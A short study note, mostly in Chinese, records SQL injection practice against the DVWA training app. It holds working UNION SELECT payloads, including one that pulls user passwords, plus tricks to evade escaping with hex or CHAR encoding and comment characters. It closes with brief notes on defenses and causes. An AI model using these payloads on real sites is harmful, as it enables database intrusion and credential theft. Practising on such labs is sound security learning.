MySQL注入心得

这是自己学习工程中用来复盘的,因为切换输入法不方便,基本采用英语
来写,看官朋友们遇到不清楚的单词请自行查阅,感谢观看!
另外,为了让自己方便观看,将采用倒序编写,最新的内容会在最前面

MySQL injection(注入)

Practice

DVWA-SQLi

http://43.247.91.228:81/login.php
  1. Vulnerability: SQL Injection
  • low
    omited
  • middle
    存在一个转义 $id = $_GET['id']; $id = mysql_real_escape_string($id); id=1 UNION SELECT 1,TABLE_NAME FROM INFORMATION_SCHEMA.TABLES 因为没有限制显示的数量,所以就全都出来了 几个注意:
    1. 库名表名,如’dvwa’,必须 间接表示
    • CHAR(100, 118, 119, 97)
    • 用hex编码:0x64767761
  • high $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;"; 后面的limit如何绕过呢,尝试注释掉:“–”尝试了,不太行,那么用“#”,可!
    payload: > ‘union select first_name,password from users#
  • impossible
    1. Anti-csrf
    2. id = $_session
    3. PDO 绑定

experience

mysql表的结构

基本步骤

  • Python:
    before using, the injection param should be put at the TAIL of url, which is
    from ?id=1%20UNION%20SELECT%201,user()&Submit=Submit# to ?Submit=Submit&id=1%20UNION%20SELECT%201,user()

效果如下:

  • 编程心得
    1. python regex
      • findall(r[pattern],String) //extract from string
      • match(r[pattern],String) //match string

Reasons of sqli

  1. user-provided params which directly connect to db WITHOUT filter $_GET
    $_POST
    $_REQUEST
  2. $result should be seen outside
    > echo($query)
    > echo…